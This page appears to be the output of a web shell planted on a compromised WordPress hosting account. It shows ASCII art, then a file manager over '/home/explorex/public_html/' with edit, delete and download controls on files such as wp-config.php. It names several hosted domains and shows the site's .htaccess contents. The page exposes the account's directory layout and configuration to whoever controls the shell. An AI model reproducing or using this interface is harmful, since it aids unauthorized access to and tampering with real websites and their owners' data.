⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢠⣴⣿⣿⣿⣷⣼⣿⠀⣴⠾⠷⠶⠦⡄⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢠⡤⢶⣦⣾⣿⣿⣿⣿⣿⣿⣿⠀⣿⣶⣶⣦⣄⠳⣤⣤⠄⠀⠀⠀ ⠀⠀⠀⢀⣼⣳⡿⢻⣿⣿⣿⣿⣿⣿⣿⣿⣶⣿⣿⣗⠈⠙⠻⣶⣄⡀⠀⠀⠀ ⠀⠀⠀⣰⠿⠁⢀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡄⠀⠀⠈⠳⣤⠀⠀ ⠀⠀⢀⡟⠀⢰⣿⠟⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⠉⠁⠈⠻⣶⣄⠀⠀⠈⠛⢦ ⠀⣀⡼⠃⠀⣼⡟⠀⠀⢸⣿⡿⠉⣿⡿⠿⠛⣿⡄⠀⠀⠀⠙⠿⣆⠀⠀⠀⠈ ⠈⠁⠀⠀⢸⡟⠀⠀⠀⢸⣿⠀⠀⣿⠁⠀⠀⠈⠃⠀⠀⠀⠀⠀⠘⢷⡄⠀⠀ ⠀⠀⠀⠀⣼⠃⠀⠀⠀⢸⡟⠀⠀⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⡆⠀ ⠀⠀⠀⣠⡏⠀⠀⠀⠀⣼⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠻⠃⠀⠀⠀⠀⣻⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ Current Dir: /home/explorex/public_html/ [DIR] .well-known [ delete | rename ] [DIR] backups [ delete | rename ] [DIR] bundles [ delete | rename ] [DIR] cgi-bin [ delete | rename ] [DIR] experthomecleaning.com [ delete | rename ] [DIR] explore.explorexpertsny.com [ delete | rename ] [DIR] explorexperts.net [ delete | rename ] [DIR] food.suri-kitchen.com [ delete | rename ] [DIR] khannahouseband.com [ delete | rename ] [DIR] ny.explorexpertsny.com [ delete | rename ] [DIR] suri-kitchen.com [ delete | rename ] [DIR] suri.suri-kitchen.com [ delete | rename ] [DIR] test.explorexpertsny.com [ delete | rename ] [DIR] wp [ delete | rename ] [DIR] wp-admin [ delete | rename ] [DIR] wp-content [ delete | rename ] [DIR] wp-includes [ delete | rename ] [FILE] .htaccess [ edit | delete | rename | download ] [FILE] .htaccess.old [ edit | delete | rename | download ] [FILE] .htaccess_bk [ edit | delete | rename | download ] [FILE] .user.ini [ edit | delete | rename | download ] [FILE] activity.log [ edit | delete | rename | download ] [FILE] error_log [ edit | delete | rename | download ] [FILE] index.php [ edit | delete | rename | download ] [FILE] license.txt [ edit | delete | rename | download ] [FILE] robots.txt [ edit | delete | rename | download ] [FILE] wp-comments-post.php [ edit | delete | rename | download ] [FILE] wp-config.php [ edit | delete | rename | download ] [FILE] wp-cron.php [ edit | delete | rename | download ] [FILE] wp-links-opml.php [ edit | delete | rename | download ] [FILE] wp-login.php [ edit | delete | rename | download ] [FILE] wp-signup.php [ edit | delete | rename | download ] [FILE] xmlrpc.php [ edit | delete | rename | download ] Viewing: /home/explorex/public_html/.htaccess # BEGIN WordPress # The directives (lines) between "BEGIN WordPress" and "END WordPress" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. <IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress # BEGIN cPanel-generated php ini directives, do not edit # Manual editing of this file may result in unexpected behavior. # To make changes to this file, use the cPanel MultiPHP INI Editor (Home >> Software >> MultiPHP INI Editor) # For more information, read our documentation (https://go.cpanel.net/EA4ModifyINI) <IfModule php8_module> php_value max_execution_time 300 php_value max_input_time 300 php_value memory_limit 512M php_value output_buffering Off php_value upload_max_filesize 8000M php_value post_max_size 8000M php_flag display_errors On php_value date.timezone "America/New_York" php_value session.save_path "/home/explorex/tmp" php_value error_log "error_log" php_flag log_errors On php_value max_input_vars 1000 php_value session.gc_maxlifetime 1440 php_flag zlib.output_compression Off </IfModule> <IfModule lsapi_module> php_value max_execution_time 300 php_value max_input_time 300 php_value memory_limit 512M php_value output_buffering Off php_value upload_max_filesize 8000M php_value post_max_size 8000M php_flag display_errors On php_value date.timezone "America/New_York" php_value session.save_path "/home/explorex/tmp" php_value error_log "error_log" php_flag log_errors On php_value max_input_vars 1000 php_value session.gc_maxlifetime 1440 php_flag zlib.output_compression Off </IfModule> # END cPanel-generated php ini directives, do not edit # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php83” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php83 .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit